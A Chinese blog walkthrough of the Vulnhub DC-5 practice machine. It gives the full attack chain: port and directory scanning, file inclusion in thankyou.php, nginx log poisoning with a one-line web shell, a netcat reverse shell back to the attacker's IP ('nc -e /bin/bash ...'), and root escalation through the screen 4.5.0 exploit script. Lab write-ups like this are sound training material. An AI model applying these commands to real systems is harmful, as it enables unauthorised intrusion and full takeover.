Vulnhub靶场渗透测试系列DC-5(screen提权)

Vulnhub靶场渗透测试系列DC-5(screen提权)

下载地址:https://www.vulnhub.com/entry/dc-5,314/
攻击机为kali2021,IP地址:192.168.172.131
下载好靶机导入VMware虚拟机,将网络模式设置为NAT模式,然后开启虚拟机
在这里插入图片描述
使用命令nmap -T4 -Pn 192.168.172.1/24进行主机发现,获取靶机的IP地址
在这里插入图片描述
使用命令nmap -T4 -A -p- 192.168.172.139扫描靶机的操作系统,开放端口和对应的服务使用的中间件等信息
在这里插入图片描述
发现有80端口的基于nginx的http服务,有个111端口的rpcbind服务,还有35216端口的未知服务,然后我们先访问80端口的http服务,在kali机打开浏览器在地址栏输入http://192.168.172.139进行访问
在这里插入图片描述
在最下方有个留言框,没有发现SQL注入和xss
在这里插入图片描述
只发现每次提交内容时底部的时间都会发生变化,2017,2018,2019
在这里插入图片描述
使用命令dirb http://192.168.172.139 -X .php .html .txt进行目录文件扫描,发现了有几个php文件,分别对应几个不同的页面
在这里插入图片描述
我们发现当我们在留言板输入内容提交时地址栏的文件为thankyou.php
在这里插入图片描述
所以猜测下方的年份显示可能是调用文件后返回的数值,尝试一下文件包含,发现成功文件包含
在这里插入图片描述
因为靶机服务扫描时发现靶机网站使用的是nginx服务器,我们知道nginx服务器的默认配置文件是/etc/nginx/nginx.conf,所以将nginx的配置文件包含过来查看日志路径,发现了nginx的日志路径
在这里插入图片描述
然后将nginx的日志文件包含过来查看
在这里插入图片描述
向日志文件传输一句话木马让其进行解析,使用burpsuite抓包改包向日志文件传入一句话木马
在这里插入图片描述
使用中国蚁剑进行连接,连接成功
在这里插入图片描述
进行目录和文件浏览
在这里插入图片描述
然后打开终端,发现是低权限用户
在这里插入图片描述
使用nc反弹shell,在kali机监听等待连接
在这里插入图片描述
在中国蚁剑中使用命令nc -e /bin/bash 192.168.172.131 6666连接kali机
在这里插入图片描述
连接成功,可以控制靶机了
在这里插入图片描述
然后进行提权,使用命令find / -user root -perm -4000 -print 2>/dev/null,查看是否有可利用的suid,发现screen-4.5.0
在这里插入图片描述
然后使用命令searchsploit screen 4.5.0搜索screen漏洞脚本文件,发现41154.sh和41154.txt文件
在这里插入图片描述
我们打开41154.sh文件查看
注意:这里编辑文件和编译文件时的目录不受限,后面上传到靶机时才需要限制在靶机/tmp/目录下在这里插入图片描述
查看文件可以知道,脚本文件需要分3个步骤完成
第一步:将第一部分diam写入libhax.c文件中,在执行相应的命令生成libhax.so文件,然后删除libhax.c文件
在这里插入图片描述
第二步:将第二部分的C语言代码写入rootshell文件中,并编译成rooshell文件,然后删除rootshell.c文件
在这里插入图片描述
第三步:将剩下部分的脚本代码写入到dc5.sh文件中,在开头加上#!/bin/bash注明执行环境,保存需要输入为set ff=unix,是为了防止脚本的格式错误
在这里插入图片描述
查看文件并将dc5.sh文件加上可执行权限
在这里插入图片描述
以上三步完成之后将生成的3个文件通过nc管道上传到靶机,在中国蚁剑上传文件到靶机的/tmp目录下
在这里插入图片描述
然后在反弹shell中使用命令执行dc5.sh文件,命令chmod +x dc5.sh增加可执行权限,执行文件
在这里插入图片描述
命令whoami查看当前用户权限,已经提权到root用户权限了
在这里插入图片描述
跳转到/root目录下ls查看文件,发现thisistheflag.txt文件,打开文件即可
在这里插入图片描述
到此渗透测试完成

参考文章:http://cn-sec.com/archives/187844.html

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值